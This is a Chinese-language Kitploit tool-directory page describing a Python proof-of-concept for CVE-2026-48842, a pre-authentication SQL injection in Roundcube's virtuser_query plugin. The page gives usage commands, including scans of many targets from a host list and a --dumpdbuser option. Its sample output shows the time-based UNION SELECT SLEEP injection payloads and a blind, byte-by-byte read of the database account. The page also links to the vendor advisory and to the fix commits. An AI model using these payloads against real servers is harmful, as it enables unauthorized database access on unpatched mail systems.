Skip to content
KitploitKITPLOIT
工具漏洞利用博客
Log in
提交
工具漏洞利用博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-48842 — 针对 CVE-2026-48842 的 Python PoC,该漏洞是 Roundcube 的 virtuser_query 插件中的预认证 SQL 注入。通过基于时间的差分确认该缺陷,并盲读数据库账户。 | Kitploit
工具/GitHubGitHub/4minx/cve-2026-48842
漏洞扫描器漏洞分析漏洞利用Web应用程序漏洞利用Web安全渗透测试数据库安全
GitHub4minx/cve-2026-48842

CVE-2026-48842

针对 CVE-2026-48842 的 Python PoC,该漏洞是 Roundcube 的 virtuser_query 插件中的预认证 SQL 注入。通过基于时间的差分确认该缺陷,并盲读数据库账户。

查看仓库
7小时48分前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2026-48842 PoC — Roundcube virtuser_query 预认证 SQLi

针对 CVE-2026-48842 的 PoC,这是 Roundcube Webmail 可选插件 virtuser_query 中的一个预认证 SQL 注入漏洞。

该工具做两件事,并且拒绝对其中任何一件进行猜测:

  1. 确认注入,使用真/假差分(而非单次 sleep)。
  2. 证明影响,通过 --dumpdbuser 从目标中读取数据库账户。

它会打印每次探测产生的确切 SQL,因此失败或不确定的结果绝不会被当作发现来呈现。


漏洞信息

CVECVE-2026-48842
类型CWE-89 — SQL 注入
组件plugins/virtuser_query/virtuser_query.php(默认未启用)
受影响Roundcube 1.6.x < 1.6.16、1.7.x < 1.7.1
已修复1.6.16、1.7.1

要求

  • Python 3.9+
  • requests
root@kitploit:~
pip install requests

用法

单个目标,仅检测

root@kitploit:~
python cve_2026_48842_poc.py https://mail.example.tld

单个目标,通过读取数据库账户证明影响

root@kitploit:~
python cve_2026_48842_poc.py https://mail.example.tld --dumpdbuser

更快的 oracle(繁忙主机可能需要调优)

root@kitploit:~
python cve_2026_48842_poc.py https://mail.example.tld -d 3 --dumpdbuser

多个目标

root@kitploit:~
python cve_2026_48842_poc.py --list hosts.txt
python cve_2026_48842_poc.py --list hosts.txt -d 3

选项

参数描述默认值
targetRoundcube 基础 URL,例如 https://mail.example.tld 或 http://host/roundcube—
-l、--list FILE每行一个目标 URL 的文件。# 开始注释。—
-d、--delay N每次 oracle 探测的 SLEEP 秒数7
--dumpdbuser注入确认后盲读 CURRENT_USER()关闭
-h、--help显示帮助—

示例输出

针对本地 Roundcube 1.6.15 的真实运行:

root@kitploit:~
[*] http://127.0.0.1/roundcube
    version=1.6.15  noise_floor=0.071s  _token=yes

[1] detection  injected=True  delta(true-false)=6.026s  delta(true-baseline)=6.015s  threshold=1.8s
    baseline                0.083s  http=401  sql_error=None
        _user=poc_baseline_user_9f2a
        SQL 1.6.15: SELECT host FROM virtuser WHERE user='poc_baseline_user_9f2a'
    artifact_unterminated    0.09s  http=401  sql_error=None
        _user=a%5C
        SQL 1.6.15: SELECT host FROM virtuser WHERE user='a\'
    injected_true           6.098s  http=401  sql_error=None
        _user=%5C%27+UNION+SELECT+IF%281%3D1%2CSLEEP%283%29%2C0%29--+-
        SQL 1.6.15: SELECT host FROM virtuser WHERE user='\\' UNION SELECT IF(1=1,SLEEP(3),0)-- -'
    injected_false          0.072s  http=401  sql_error=None
        _user=%5C%27+UNION+SELECT+IF%281%3D2%2CSLEEP%283%29%2C0%29--+-
        SQL 1.6.15: SELECT host FROM virtuser WHERE user='\\' UNION SELECT IF(1=2,SLEEP(3),0)-- -'

[2] blind read of the database account (~42s per byte, no quotes used)
    subquery: SELECT CURRENT_USER()
    length=14 bytes
    [  1/14] 'r'      [  2/14] 'ro'     [  3/14] 'roo'    [  4/14] 'root'
    [  5/14] 'root@'  [  6/14] 'root@l'  [  7/14] 'root@lo' [  8/14] 'root@loc'
    [  9/14] 'root@loca'  [ 10/14] 'root@local'  [ 11/14] 'root@localh'
    [ 12/14] 'root@localho' [ 13/14] 'root@localhos' [ 14/14] 'root@localhost'

[+] database account = 'root@localhost'

☕ 支持

如果这个项目对你有帮助,请考虑支持它的开发:

USDT (TRC-20)

TDCPYioWbZW4iyMCuHhJeFsUZJ88YqZWc1

USDT TRC-20 QR

ETH (ERC-20)

0xf6eA555f95ed5b356fF7a90E6461EbBF6ce105cE

Ethereum QR

参考

  • Roundcube 安全公告 2026-05-24 — https://roundcube.net/news/2026/05/24/security-updates-1.6.16-and-1.7.1
  • 修复提交 (1.6.x) — https://github.com/roundcube/roundcubemail/commit/3406183a9976e36f992d3468f37d0e2346526ee9
  • 修复提交 (1.7.x) — https://github.com/roundcube/roundcubemail/commit/87124cc7136a48b5fa9d2b40dfead6e9dcaeaf4b
  • NVD — https://nvd.nist.gov/vuln/detail/CVE-2026-48842
下载工具